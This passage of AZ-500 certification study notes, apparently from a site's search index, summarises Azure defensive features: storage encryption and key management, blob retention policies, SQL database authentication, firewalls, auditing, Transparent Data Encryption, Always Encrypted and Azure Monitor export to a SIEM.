                            The authorization step requires one or more Azure roles to be assigned to the security principal. Native and web applications that request the Azure Queue service can also authorize access with Microsoft Entra ID.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#35-implement-storage-service-encryption","title":"3.5. Implement storage service encryption","text":"
                            • All data (including metadata) written to Azure Storage is automatically encrypted using Storage Service Encryption (SSE).
                            • Microsoft Entra ID and Role-Based Access Control (RBAC) are supported for Azure Storage for both resource management operations and data operations, as follows:
                              • You can assign RBAC roles scoped to the storage account to security principals and use Microsoft Entra ID to authorize resource management operations such as key management.
                              • Microsoft Entra integration is supported for blob and queue data operations. You can assign RBAC roles scoped to a subscription, resource group, storage account, or an individual container or queue to a security principal or a managed identity for Azure resources.
                            • Data can be secured in transit between an application and Azure by using Client-Side Encryption, HTTPS, or SMB 3.0.
                            • OS and data disks used by Azure virtual machines can be encrypted using Azure Disk Encryption.
                            • Delegated access to the data objects in Azure Storage can be granted using a shared access signature.

                            Azure Storage Service Encryption (SSE) for data at rest. -

                            • When a new storage account is provisioned, Azure Storage Encryption is automatically enabled for it and it cannot be disabled. Storage accounts are encrypted regardless of their performance tier (standard or premium) or deployment model (Azure Resource Manager or classic). All Azure Storage redundancy options support encryption, and all copies of a storage account are encrypted. All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. All object metadata is also encrypted.
                            • Data in Azure Storage is encrypted and decrypted transparently using 256-bit AES encryption, one of the strongest block ciphers available, and is FIPS 140-2 compliant.
                            • Azure Storage encryption is similar to BitLocker encryption on Windows.
                            • Encryption does not affect Azure Storage performance. There is no additional cost for Azure Storage encryption.

                            Encryption key management

                            You can rely on Microsoft-managed keys for the encryption of your storage account, or you can manage encryption with your own keys. If you choose to manage encryption with your own keys, you have two options:

                            • You can specify a\u00a0customer-managed\u00a0key to use for encrypting and decrypting all data in the storage account. A customer-managed key is used to encrypt all data in all services in your storage account.
                            • You can specify a\u00a0customer-provided\u00a0key on Blob storage operations. A client making a read or write request against Blob storage can include an encryption key on the request for granular control over how blob data is encrypted and decrypted.

                            The following table compares key management options for Azure Storage encryption.

                            Microsoft-managed keys Customer-managed keys Customer-provided keys Encryption/decryption operations Azure Azure Azure Azure Storage services supported All Blob storage, Azure Files Blob storage Key storage Microsoft key store Azure Key Vault Azure Key Vault or any other key store Key rotation responsibility Microsoft Customer Customer Key usage Microsoft Azure portal, Storage Resource Provider REST API, Azure Storage management libraries, PowerShell, CLI Azure Storage REST API (Blob storage), Azure Storage client libraries Key access Microsoft only Microsoft, Customer Customer only","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#36-configure-blob-data-retention-policies","title":"3.6. Configure blob data retention policies","text":"

                            *Immutable storage in Azure blob storage:

                            Immutable storage for Azure Blob storage enables users to store business-critical data objects in a WORM (Write Once, Read Many) state. Immutable storage is available for general-purpose v2 and Blob storage accounts in all Azure regions.

                            Time-based retention policy support: Users can set policies to store data for a specified interval. When a time-based retention policy is set, blobs can be created and read, but not modified or deleted. After the retention period has expired, blobs can be deleted but not overwritten. When a time-based retention policy is applied on a container, all blobs in the container will stay in the immutable state for the duration of the effective retention period. The effective retention period for blobs is equal to the difference between the blob's creation time and the user-specified retention interval. Because users can extend the retention interval, immutable storage uses the most recent value of the user-specified retention interval to calculate the effective retention period.

                            Legal hold policy support: If the retention interval is not known, users can set legal holds to store immutable data until the legal hold is cleared. When a legal hold policy is set, blobs can be created and read, but not modified or deleted. Each legal hold is associated with a user-defined alphanumeric tag (such as a case ID, event name, etc.) that is used as an identifier string. Legal holds are temporary holds that can be used for legal investigation purposes or general protection policies. Each legal hold policy needs to be associated with one or more tags. Tags are used as a named identifier, such as a case ID or event, to categorize and describe the purpose of the hold.

                            Support for all blob tiers: WORM policies are independent of the Azure Blob storage tier and apply to all the tiers: hot, cool, and archive. Users can transition data to the most cost-optimized tier for their workloads while maintaining data immutability.

                            Container-level configuration: Users can configure time-based retention policies and legal hold tags at the container level. By using simple container-level settings, users can create and lock time-based retention policies, extend retention intervals, set and clear legal holds, and more. These policies apply to all the blobs in the container, both existing and new.

                            Audit logging support: Each container includes a policy audit log. It shows up to seven time-based retention commands for locked time-based retention policies and contains the user ID, command type, time stamps, and retention interval. For legal holds, the log contains the user ID, command type, time stamps, and legal hold tags. This log is retained for the lifetime of the policy, in accordance with the SEC 17a-4(f) regulatory guidelines. The Azure Activity Log shows a more comprehensive log of all the control plane activities; while enabling Azure Resource Logs retains and shows data plane operations. It is the user's responsibility to store those logs persistently, as might be required for regulatory or other purposes.

                            A container can have both a legal hold and a time-based retention policy at the same time. All blobs in that container stay in the immutable state until all legal holds are cleared, even if their effective retention period has expired. Conversely, a blob stays in an immutable state until the effective retention period expires, even though all legal holds have been cleared.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#37-storage-account-keys","title":"3.7. Storage Account Keys","text":"

                            Generated by Azure when creating the storage account. Azure generates 2 keys of 512-BITS. You use these keys to authorize access to data that resides in your storage account via Shared Key authorization. Azure KeyVault simplefies this process and allows your to perform the rotation of keys without interrupting the applications.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#38-configure-azure-files-authentication","title":"3.8. Configure Azure files authentication","text":"

                            Azure Files supports identity-based authentication over Server Message Block (SMB) through on-premises Active Directory Domain Services (AD DS) and Microsoft Entra Domain Services (Microsoft Entra Domain Services). With RBAC, the credentials you use for file access should be available or synced to Microsoft Entra ID.

                            Azure Files enforces authorization on user access to both the share and the directory/file levels.

                            At the directory/file level, Azure Files supports preserving, inheriting, and enforcing Windows DACLs just like any Windows file servers. You can choose to keep Windows DACLs when copying data over SMB between your existing file share and your Azure file shares. Whether you plan to enforce authorization or not, you can use Azure file shares to back up ACLs along with your data.

                            Benefits of Identity-based authentication over using Shared Key authentication:

                            • Extend the traditional identity-based file share access experience to the cloud with on-premises AD DS and Microsoft Entra Domain Services.
                            • Enforce granular access control on Azure file shares.
                            • Back up Windows ACLs (also known as NTFS) along with your data. You can copy ACLs on a directory or file to Azure file shares using either Azure File Sync or common file movement toolsets. For example, you can use robocopy with the /copy:s flag to copy data as well as ACLs to an Azure file share. ACLs are preserved by default, you are not required to enable identity-based authentication on your storage account to preserve ACLs.

                            How it works:

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#39-enable-the-secure-transfer-required-property","title":"3.9. Enable the secure transfer required property","text":"

                            You can configure your storage account to accept requests from secure connections only by setting the Secure transfer required property for the storage account. When you require secure transfer, any requests originating from an insecure connection are rejected. Microsoft recommends that you always require secure transfer for all of your storage accounts.

                            Connecting to an Azure File share over SMB without encryption fails when secure transfer is required for the storage account. Examples of insecure connections include those made over SMB 2.1, SMB 3.0 without encryption, or some versions of the Linux SMB client. Azure Files connections require encryption (SMB)

                            By default, the Secure transfer required property is enabled when you create a storage account. Azure Storage doesn't support HTTPS for\u00a0custom domain names, this option is not applied when you're using a custom domain name.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#4-sql-database-security","title":"4. SQL database security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#41-sql-database-authentication","title":"4.1. SQL database authentication","text":"

                            A user is authenticated using one of the following two authentication methods:

                            • SQL authentication\u00a0- With this authentication method, the user submits a user account name and associated password to establish a connection. This password is stored in the master database for user accounts linked to a login or stored in the database containing the user accounts not linked to a login.
                            • Microsoft Entra authentication\u00a0- With this authentication method, the user submits a user account name and requests that the service use the credential information stored in Microsoft Entra ID.

                            You can create user accounts in the master database, and grant permissions in all databases on the server, or you can create them in the database itself (called contained database users). By using contained databases, you obtain enhance portability and scalability.

                            Logins and users: In Azure SQL, a user account in a database can be associated with a login that is stored in the master database or can be a user name that is stored in an individual database.

                            • A\u00a0login\u00a0is an individual account in the master database, to which a user account in one or more databases can be linked. With a login, the credential information for the user account is stored with the login.
                            • A\u00a0user account\u00a0is an individual account in any database that may be but does not have to be linked to a login. With a user account that is not linked to a login, the credential information is stored with the user account.

                            Authorization\u00a0to access data and perform various actions are managed using database roles and explicit permissions. \u00a0Authorization is controlled by your user account's database role memberships and object-level permissions.

                            Best practices: - you should grant users the least privileges necessary. - your application should use a dedicated account to authenticate. - Recommendation: to create a contained database user, which allows your app to authenticate directly to the database.

                            Use Microsoft Entra authentication to centrally manage identities of database users and as an alternative to SQL Server authentication.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#42-configure-sql-database-firewalls","title":"4.2. Configure SQL database firewalls","text":"

                            Azure SQL Database and Azure Synapse Analytics, previously SQL Data Warehouse, (both referred to as SQL Database in this lesson) provide a relational database service for Azure and other internet-based applications.

                            Initially, all access to your Azure SQL Database is blocked by the SQL Database firewall.

                            The firewall grants access to databases based - on the originating IP address of each request. - on virtual network rules based on virtual network service endpoints. Virtual network rules might be preferable to IP rules in some cases.

                            Azure SQL Firewall IP Rules: - Server-level IP firewall rules allow clients to access the entire Azure SQL server, which includes all databases hosted in it. The master database holds these rules. You can configure a maximum of 128 server-level IP firewall rules for an Azure SQL server. You can configure server-level IP firewall rules using the Azure portal, PowerShell, or by using Transact-SQL statements. To create server-level IP firewall rules using the Azure portal or PowerShell, you must be the subscription owner or a subscription contributor. To create a server-level IP firewall rule using Transact-SQL, you must connect to the SQL Database instance as the server-level principal login or the Microsoft Entra administrator (which means that a server-level IP firewall rule must have first been created by a user with Azure-level permissions). - Database-level IP firewall rules are used to allow access to specific databases on a SQL Database server. You can create them for each database, included the master database. Also, there is a maximum of 128 rules. ou can only create and manage database-level IP firewall rules for master databases and user databases by using Transact-SQL statements, and only after you have configured the first server-level firewall.

                            Azure Synapse Analytics only supports server-level IP firewall rules, and not database-level IP firewall rules.

                            Data-level Firewall rules get evaluated first:

                            To allow applications from Azure to connect to your Azure SQL Database, Azure connections must be enabled. When an application from Azure attempts to connect to your database server, the firewall verifies that Azure connections are allowed. A firewall setting with starting and ending addresses equal to 0.0.0.0 indicates Azure connections are allowed. This option configures the firewall to allow all connections from Azure including connections from the subscriptions of other customers. When selecting this option, make sure your sign-in and user permissions limit access to authorized users only.

                            Whenever possible, as a best practice, use database-level IP firewall rules to enhance security and to make your database more portable. Use server-level IP firewall rules for administrators and when you have several databases with the same access requirements, and you don't want to spend time configuring each database individually.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#43-enable-and-monitor-database-auditing","title":"4.3. Enable and monitor database auditing","text":"

                            Auditing for Azure SQL Database and Azure Synapse Analytics tracks database events and writes them to an audit log in your Azure storage account, Log Analytics workspace or Event Hubs.

                            Auditing also:

                            • Helps you maintain regulatory compliance, understand database activity, and gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations.
                            • Enables and facilitates adherence to compliance standards, although it\u00a0doesn't guarantee compliance.

                            You can use SQL database auditing to:

                            • Retain\u00a0an audit trail of selected events. You can define categories of database actions to be audited.
                            • Report\u00a0on database activity. You can use pre-configured reports and a dashboard to get started quickly with activity and event reporting.
                            • Analyze\u00a0reports. You can find suspicious events, unusual activity, and trends.

                            In auditing, server-level auditing policies take precedence over database-label auditing policies. This means that:

                            • A server policy applies to all existing and newly created databases on the server.
                            • If server auditing is enabled, it always applies to the database. The database will be audited, regardless of the database auditing settings.
                            • Enabling auditing on the database or data warehouse, in addition to enabling it on the server, does not override or change any of the settings of the server auditing. Both audits will exist side by side. In other words, the database is audited twice in parallel; once by the server policy and once by the database policy.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#44-implement-data-discovery-and-classification","title":"4.4. Implement data discovery and classification","text":"

                            Data discovery and classification provides advanced capabilities built into Azure SQL Database for discovering, classifying, labeling and protecting sensitive data (such as business, personal data, and financial information) in your databases. Discovering and classifying this data can play a pivotal role in your organizational information protection stature. It can serve as infrastructure for:

                            • Helping meet data privacy standards and regulatory compliance requirements.
                            • Addressing various security scenarios such as monitoring, auditing, and alerting on anomalous access to sensitive data.
                            • Controlling access to and hardening the security of databases containing highly sensitive data.

                            Data exists in one of three basic states: at\u00a0rest, in\u00a0process, and in\u00a0transit. All three states require unique technical solutions for data classification, but the applied principles of data classification should be the same for each. Data that is classified as confidential needs to stay confidential when at rest, in process, or in transit.

                            Data can also be either\u00a0structured\u00a0or\u00a0unstructured. Typical classification processes for structured data found in databases and spreadsheets are less complex and time-consuming to manage than those for unstructured data such as documents, source code, and email. Generally, organizations will have more unstructured data than structured data.

                            Protect data at rest

                            Best practice Solution Apply disk encryption to help safeguard your data. Use Microsoft Azure Disk Encryption, which enables IT administrators to encrypt both Windows infrastructure as a service (IaaS) and Linux IaaS virtual machine (VM) disks. Disk encryption combines the industry-standard BitLocker feature and the Linux DM-Crypt feature to provide volume encryption for the operating system (OS) and the data disks. \u200eAzure Storage and Azure SQL Database encrypt data at rest by default, and many services offer encryption as an option. You can use Azure Key Vault to maintain control of keys that access and encrypt your data. Use encryption to help mitigate risks related to unauthorized data access. Encrypt your drives before you write sensitive data to them.

                            Protect data in transit

                            We generally recommend that you always use SSL/TLS protocols to exchange data across different locations. . In some circumstances, you might want to isolate the entire communication channel between your on-premises and cloud infrastructures by using a VPN. For data moving between your on-premises infrastructure and Azure, consider appropriate safeguards such as HTTPS or VPN. When sending encrypted traffic between an Azure virtual network and an on-premises location over the public internet, use Azure VPN Gateway.

                            Best practice Solution Secure access from multiple workstations located on-premises to an Azure virtual network Use site-to-site VPN. Secure access from an individual workstation located on-premises to an Azure virtual network Use point-to-site VPN. Move larger data sets over a dedicated high-speed wide area network (WAN) link Use Azure ExpressRoute. If you choose to use ExpressRoute, you can also encrypt the data at the application level by using SSL/TLS or other protocols for added protection. Interact with Azure Storage through the Azure portal All transactions occur via HTTPS. You can also use Storage REST API over HTTPS to interact with Azure Storage and Azure SQL Database.

                            Data discovery and classification is part of the Advanced Data Security offering, which is a unified package for advanced Microsoft SQL Server security capabilities. You access and manage data discovery and classification via the central SQL Advanced Data Security portal.

                            • Discovery and recommendations\u00a0- The classification engine scans your database and identifies columns containing potentially sensitive data. It then provides you with an easier way to review and apply the appropriate classification recommendations via the Azure portal.
                            • Labeling\u00a0- Sensitivity classification labels can be persistently tagged on columns using new classification metadata attributes introduced into the SQL Server Engine. This metadata can then be utilized for advanced sensitivity-based auditing and protection scenarios.
                            • Information Types\u00a0- These provide additional granularity into the type of data stored in the column.
                            • Query result set sensitivity\u00a0- The sensitivity of the query result set is calculated in real time for auditing purposes.
                            • Visibility\u00a0- You can view the database classification state in a detailed dashboard in the Azure portal. Additionally, you can download a report (in Microsoft Excel format) that you can use for compliance and auditing purposes, in addition to other needs.

                            SQL data discovery and classification comes with a built-in set of sensitivity labels and information types, and discovery logic. You can now customize this taxonomy and define a set and ranking of classification constructs specifically for your environment. Definition and customization of your classification taxonomy takes place in one central location for your entire Azure Tenant. That location is in Microsoft Defender for Cloud, as part of your Security Policy. Only a user with administrative rights on the Tenant root management group can perform this task.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#45-microsoft-defender-for-sql","title":"4.5. Microsoft Defender for SQL","text":"

                            Applies to:\u00a0Azure SQL Database\u00a0|\u00a0Azure SQL Managed Instance\u00a0|\u00a0Azure Synapse Analytics

                            Microsoft Defender for SQL includes functionality for surfacing and mitigating potential database vulnerabilities and detecting anomalous activities that could indicate a threat to your database. It provides a single go-to location for enabling and managing these capabilities.

                            Microsoft Defender for SQL provides:

                            • Vulnerability Assessment is an easy-to-configure service that can discover, track, and help you remediate potential database vulnerabilities. It provides visibility into your security state, and it includes actionable steps to resolve security issues and enhance your database fortifications.
                            • Advanced Threat Protection detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit your database. It continuously monitors your database for suspicious activities, and it provides immediate security alerts on potential vulnerabilities, Azure SQL injection attacks, and anomalous database access patterns. Advanced Threat Protection alerts provide details of suspicious activity and recommend action on how to investigate and mitigate the threat.

                            Enabling or managing Microsoft Defender for SQL settings requires belonging to the SQL security manager role or one of the database or server admin roles.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#vulnerability-assessment-for-sql-server","title":"Vulnerability assessment for SQL Server","text":"

                            Applies to: Azure SQL Database\u00a0|\u00a0Azure SQL Managed Instance\u00a0|\u00a0Azure Synapse Analytics

                            • Vulnerability assessment is a scanning service built into Azure SQL Database.
                            • The service employs a knowledge base of rules that flag security vulnerabilities.
                            • These rules cover database-level issues and server-level security issues, like server firewall settings and server-level permissions. - Permission configurations. - Feature configurations. - Database settings
                            • The results of the scan include actionable steps to resolve each issue and provide customized remediation scripts where applicable.
                            • Vulnerability assessment is part of Microsoft Defender for Azure SQL, which is a unified package for advanced SQL security capabilities. Vulnerability assessment can be accessed and managed from each SQL database resource in the Azure portal.

                            SQL vulnerability assessment express and classic configurations. - You can configure vulnerability assessment for your SQL databases with either:

                            • Express configuration (preview) \u2013 The default procedure that lets you configure vulnerability assessment without dependency on external storage to store baseline and scan result data.
                            • Classic configuration \u2013 The legacy procedure that requires you to manage an Azure storage account to store baseline and scan result data.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#46-sql-advanced-threat-protection","title":"4.6. SQL Advanced Threat Protection","text":"

                            Applies to: Azure SQL Database | Azure SQL Managed Instance | Azure Synapse Analytics | SQL Server on Azure Virtual Machines | Azure Arc-enabled SQL Server

                            • SQL Advanced Threat Protection detects anomalous activities indicating unusual and potentially harmful attempts to access or exploit databases.
                            • Users receive an alert upon suspicious database activities, potential vulnerabilities, and SQL injection attacks, as well as anomalous database access and queries patterns.
                            • Advanced Threat Protection integrates alerts with Microsoft Defender for Cloud.
                            • For a full investigation experience, it is recommended to enable auditing, which writes database events to an audit log in your Azure storage account.
                            • Click\u00a0the\u00a0Advanced Threat Protection alert\u00a0to launch the Microsoft Defender for Cloud alerts page and get an overview of active SQL threats detected on the database.
                            • Advanced Threat Protection is part of the Microsoft Defender for SQL offering, which is a unified package for advanced SQL security capabilities. Advanced Threat Protection can be accessed and managed via the central Microsoft Defender for SQL portal.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#47-sql-database-dynamic-data-masking-ddm","title":"4.7. SQL Database Dynamic Data Masking (DDM)","text":"

                            Dynamic data masking helps prevent unauthorized access to sensitive data by enabling customers to designate how much of the sensitive data to reveal with minimal impact on the application layer. You set up a dynamic data masking policy in the Azure portal by selecting the dynamic data masking operation in your SQL Database configuration blade or settings blade. This feature cannot be set by using portal for Azure Synapse

                            Configuring DDM policy. -

                            • SQL users excluded from masking\u00a0- A set of SQL users or Microsoft Entra identities that get unmasked data in the SQL query results. Users with administrator privileges are always excluded from masking, and view the original data without any mask.
                            • Masking rules\u00a0- A set of rules that define the designated fields to be masked and the masking function that is used. The designated fields can be defined using a database schema name, table name, and column name.
                            • Masking functions\u00a0- A set of methods that control the exposure of data for different scenarios.

                            The DDM recommendations engine, flags certain fields from your database as potentially sensitive fields, which may be good candidates for masking. In the Dynamic Data Masking blade in the portal, you can review the recommended columns for your database. All you need to do is click\u00a0Add Mask\u00a0for one or more columns and then\u00a0Save\u00a0to apply a mask for these fields.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#48-implement-transparent-data-encryption-tde","title":"4.8. Implement Transparent Data Encryption (TDE)","text":"
                            • Applies to Azure SQL Database | Azure SQL Managed Instance | Synapse SQL in Azure Synapse Analytics.
                            • To configure TDE through the Azure portal, you must be connected as the Azure Owner, Contributor, or SQL Security Manager.
                            • Encrypts data at rest.
                            • It performs real-time encryption and decryption of the database, associated backups, and transaction log files at rest without requiring changes to the application.
                            • By default, TDE is enabled for all newly deployed Azure SQL databases\u00a0and needs to be manually enabled for older databases of Azure SQL Database, Azure SQL Managed Instance, or Azure Synapse.
                            • It cannot be used to encrypt the logical master database because this db contains objects that TDE needs to perform the encrypt/decrypt operations.
                            • TDE encrypts the storage of an entire database by using a symmetric key called the Database Encryption Key (DEK).
                            • DEK is protected by the TDE protector. Where is this TDE protector set?:
                              • At the logical SQL server level: For Azure SQL Database and Azure Synapse, the TDE protector is set at the logical SQL server level and is inherited by all databases associated with that server.
                              • At the instance level: For Azure SQL Managed Instance (BYOK feature in preview), the TDE protector is set at the instance level and it is inherited by all encrypted databases on that instance.

                            TDE protector is either a service-managed certificate (service-managed transparent data encryption) or an asymmetric key stored in Azure Key Vault (customer-managed transparent data encryption)

                            • The default setting for TDE is that the DEK is protected by a built-in server certificate.
                              • If two databases are connected to the same server, they also share the same built-in certificate.
                              • The built-in server certificate is unique for each server and the encryption algorithm used is AES 256.
                              • Microsoft automatically rotates these certificates. Additionally, Microsoft seamlessly moves and manages the keys as needed for geo-replication and restores.
                              • the root key is protected by a Microsoft internal secret store.
                            • With Customer-managed TDE or Bring Your Own Key (BYOK), \u00a0the TDE Protector that encrypts the DEK is a customer-managed asymmetric key, which is stored in a customer-owned and managed Azure Key Vault (Azure's cloud-based external key management system) and never leaves the key vault.
                              • The TDE Protector can be generated by the key vault or transferred to the key vault from an on premises hardware security module (HSM) device.
                              • SQL Database needs to be granted permissions to the customer-owned key vault to decrypt and encrypt the DEK.
                              • With TDE with Azure Key Vault integration, users can control key management tasks including key rotations, key vault permissions, key backups, and enable auditing/reporting on all TDE protectors using Azure Key Vault functionality.

                            Turn on and off TDE from Azure portal.

                            Except for Azure SQL Managed Instance, there you need to use T-SQL to turn TDE on and off on a database.

                            Transact-SQL (T-SQL) is an extension of the standard SQL (Structured Query Language) used for querying and managing relational databases, particularly in the context of Microsoft SQL Server and Azure SQL Database. It is needed and used for the following reasons: 1. Procedural Capabilities: T-SQL includes procedural programming constructs such as variables, loops, and conditional statements, which are not part of standard SQL. 2. SQL Server Specific Functions: T-SQL includes functions and features that are specific to SQL Server and may not be supported by other database management systems. 3. System Management: T-SQL provides commands and procedures for managing SQL Server instances, databases, and security, which are not part of the standard SQL language. 4. Error Handling: T-SQL has error handling mechanisms like TRY...CATCH blocks, which are not part of the standard SQL syntax.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#49-azure-sql-always-encrypted","title":"4.9. Azure SQL Always Encrypted","text":"

                            Always Encrypted helps protect sensitive data at rest on the server, during movement between client and server, and while the data is in use. Always Encrypted ensures that sensitive data never appears as plaintext inside the database system. After you configure data encryption, only client applications or app servers that have access to the keys can access plaintext data. Always Encrypted uses the AEAD_AES_256_CBC_HMAC_SHA_256 algorithm to encrypt data in the database.

                            Always Encrypted allows clients to encrypt sensitive data inside client applications and never reveal the encryption keys to the Database Engine (SQL Database or SQL Server).

                            An example: Client On-Premises with Data in Azure __ A customer has an on-premises client application at their business location. The application operates on sensitive data stored in a database hosted in Azure (SQL Database or SQL Server running in a virtual machine on Microsoft Azure). The customer uses Always Encrypted and stores Always Encrypted keys in a trusted key store hosted on-premises, to ensure Microsoft cloud administrators have no access to sensitive data. Client and Data in Azure __ A customer has a client application, hosted in Microsoft Azure (for example, in a worker role or a web role), which operates on sensitive data stored in a database hosted in Azure (SQL Database or SQL Server running in a virtual machine on Microsoft Azure). Although Always Encrypted does not provide complete isolation of data from cloud administrators, as both the data and keys are exposed to cloud administrators of the platform hosting the client tier, the customer still benefits from reducing the security attack surface area (the data is always encrypted in the database).

                            The Always Encrypted-enabled driver automatically encrypts and decrypts sensitive data in the client application before sending the data off to the SQL server. Always Encrypted supports two types of encryption: randomized encryption and deterministic encryption.

                            • Deterministic encryption\u00a0always generates the same encrypted value for any given plain text value. Using deterministic encryption allows point lookups, equality joins, grouping and indexing on encrypted columns. However, it may also allow unauthorized users to guess information about encrypted values by examining patterns in the encrypted column, especially if there is a small set of possible encrypted values, such as True/False, or North/South/East/West region. Deterministic encryption must use a column collation with a binary2 sort order for character columns.
                            • Randomized encryption\u00a0uses a method that encrypts data in a less predictable manner. Randomized encryption is more secure, but prevents searching, grouping, indexing, and joining on encrypted columns.

                            Available is all editions of Azure SQL Database starting with SQL Server 2016.

                            Deploy an always encrypted implementation. -

                            The initial setup of Always Encrypted in a database involves generating Always Encrypted keys, creating key metadata, configuring encryption properties of selected database columns, and/or encrypting data that may already exist in columns that need to be encrypted.

                            Some of these tasks aren't supported in Transact-SQL. You can use SQL Server Management Studio (SSMS) or PowerShell to accomplish such tasks.

                            Task SSMS PowerShell SQL Provisioning column master keys, column encryption keys and encrypted column encryption keys with their corresponding column master keys Yes Yes No Creating key metadata in the database Yes Yes Yes Creating new tables with encrypted columns Yes Yes Yes Encrypting existing data in selected database columns Yes Yes No

                            When setting up encryption for a column, you specify the information about the encryption algorithm and cryptographic keys used to protect the data in the column. Always Encrypted uses two types of keys: column encryption keys and column master keys. A column encryption key is used to encrypt data in an encrypted column. A column master key is a key-protecting key that encrypts one or more column encryption keys.

                            The Database Engine stores encryption configuration for each column in database metadata. Note, however, the Database Engine never stores or uses the keys of either type in plaintext. It only stores encrypted values of column encryption keys and the information about the location of column master keys, which are stored in external trusted key stores, such as Azure Key Vault, Windows Certificate Store on a client machine, or a hardware security module.

                            To access data stored in an encrypted column in plaintext, an application must use an Always Encrypted enabled client driver. When an application issues a parameterized query, the driver transparently collaborates with the Database Engine to determine which parameters target encrypted columns and, thus, should be encrypted. For each parameter that needs to be encrypted, the driver obtains the information about the encryption algorithm and the encrypted value of the column encryption key for the column, the parameter targets, as well as the location of its corresponding column master key.

                            Next, the driver contacts the key store, containing the column master key, in order to decrypt the encrypted column encryption key value and then, it uses the plaintext column encryption key to encrypt the parameter. The resultant plaintext column encryption key is cached to reduce the number of round trips to the key store on subsequent uses of the same column encryption key. The driver substitutes the plaintext values of the parameters targeting encrypted columns with their encrypted values, and it sends the query to the server for processing.

                            The server computes the result set, and for any encrypted columns included in the result set, the driver attaches the encryption metadata for the column, including the information about the encryption algorithm and the corresponding keys. The driver first tries to find the plaintext column encryption key in the local cache, and only makes a round to the column master key if it can't find the key in the cache. Next, the driver decrypts the results and returns plaintext values to the application.

                            A client driver interacts with a key store, containing a column master key, using a column master key store provider, which is a client-side software component that encapsulates a key store containing the column master key. Providers for common types of key stores are available in client-side driver libraries from Microsoft or as standalone downloads. You can also implement your own provider. Always Encrypted capabilities, including built-in column master key store providers vary by a driver library and its version.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/","title":"IV. Security operation","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#1-configure-and-manage-azure-monitor","title":"1. Configure and manage Azure Monitor","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-4-security-operations/#11-exploring-azure-monitor","title":"1.1. Exploring Azure Monitor","text":"

                            Exporting data to a SIEM

                            Azure Monitor offers a consolidated pipeline for routing any of your monitoring data into a SIEM tool. This is done by streaming that data to an event hub, where it can then be pulled into a partner tool. This pipe uses the Azure Monitor single pipeline for getting access to the monitoring data from your Azure environment. Currently, the exposed security data from Microsoft Defender for Cloud to a SIEM consists of security alerts.

                            Microsoft Defender for Cloud security alerts Microsoft Defender for Cloud automatically collects, analyzes, and integrates log data from your Azure resources; the network; and connected partner solutions.

                            Azure Event Hubs Azure Event Hubs is a streaming platform and event ingestion service that can transform and store data by using any real-time analytics provider or batching/storage adapters. Use Event Hubs to stream log data from Azure Monitor to a Microsoft Sentinel or a partner SIEM and monitoring tools. What data can be sent into an event hub? Within your Azure environment, there are several 'tiers' of monitoring data, and the method of accessing data from each tier varies slightly.

                            • Application monitoring data\u00a0- Data about the performance and functionality of the code you have written and are running on Azure. Examples of application monitoring data include performance traces, application logs, and user telemetry. Application monitoring data is usually collected in one of the following ways:
                              • By instrumenting your code with an SDK such as the\u00a0Application Insights SDK.
                              • By running a monitoring agent that listens for new application logs on the machine running your application, such as the\u00a0Windows Azure Diagnostic Agent\u00a0or\u00a0Linux Azure Diagnostic Agent.
                            • Guest OS monitoring data\u00a0- Data about the operating system on which your application is running. Examples of guest OS monitoring data would be Linux syslog or Windows system events. To collect this type of data, you need to install an agent such as the\u00a0Windows Azure Diagnostic Agent\u00a0or\u00a0Linux Azure Diagnostic Agent.
                            • Azure resource monitoring data\u00a0- Data about the operation of an Azure resource. For some Azure resource types, such as virtual machines, there is a guest OS and application(s) to monitor inside of that Azure service. For other Azure resources, such as Network Security Groups, the resource monitoring data is the highest tier of data available (since there is no guest OS or application running in those resources). This data can be collected using resource diagnostic settings.
                            • Azure subscription monitoring data\u00a0- Data about the operation and management of an Azure subscription, as well as data about the health and operation of Azure itself. The activity log contains most subscription monitoring data, such as service health incidents and Azure Resource Manager audits. You can collect this data using a Log Profile.
